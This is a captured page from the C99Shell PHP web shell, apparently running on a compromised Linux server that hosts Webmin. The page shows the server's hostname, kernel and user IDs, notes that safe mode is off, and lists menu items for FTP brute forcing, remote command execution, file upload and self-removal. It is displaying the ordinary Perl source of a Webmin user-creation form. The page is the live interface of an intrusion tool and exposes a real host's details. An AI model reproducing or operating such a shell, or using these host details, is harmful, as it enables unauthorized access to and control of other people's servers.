!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.42 GB of 117.98 GB (24.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     mass_ucreate_form.cgi (1.76 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a form for creating multiple users from a text file.
# This is in the format :
#    user:realname:pass:ftp:email:quota:extras:forwards:dbs

require './virtual-server-lib.pl';
&ReadParse();
$d = &get_domain($in{'dom'});
&can_edit_domain($d) || &error($text{'users_ecannot'});
&ui_print_header(&domain_in($d), $text{'umass_title'}, "", "umass");

print $text{'umass_help'};
print "<br><tt>$text{'umass_format'}</tt><p>";
print $text{'umass_formatftp'},"<br>\n";
print $text{'umass_formatemail'},"<p>\n";
print &text('umass_help2', "edit_user.cgi?new=1&dom=$in{'dom'}"),"<p>\n";

print &ui_form_start("mass_ucreate.cgi", "form-data");
print &ui_table_start($text{'umass_header'}, "width=100%", 2);
print &ui_hidden("dom", $in{'dom'}),"\n";

# Source file / data
if (&master_admin()) {
    push(@sopts, [ 1, &text('cmass_local',
               &ui_textbox("local", undef, 40))."<br>" ]);
    }
push(@sopts, [ 0, &text('cmass_upload', &ui_upload("upload", 40))."<br>" ]);
push(@sopts, [ 2, &text('cmass_text', &ui_textarea("text", "", 5, 60))."<br>"]);
print &ui_table_row($text{'cmass_file'},
            &ui_radio("file_def", 0, \@sopts));

# Separator character
print &ui_table_row($text{'umass_separator'},
            &ui_radio("separator", ":",
                  [ [ ":", $text{'umass_separatorcolon'} ],
                [ ",", $text{'umass_separatorcomma'} ],
                [ "tab", $text{'umass_separatortab'} ] ]));

# Password format (encrypted or not)
print &ui_table_row($text{'umass_encpass'},
            &ui_yesno_radio("encpass", 0));

# Generate random passwords
print &ui_table_row($text{'umass_randpass'},
            &ui_yesno_radio("randpass", 0));

print &ui_table_end();
print &ui_form_end([ [ "create", $text{'create'} ] ]);

&ui_print_footer("list_users.cgi?dom=$in{'dom'}", $text{'users_return'},
         "", $text{'index_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--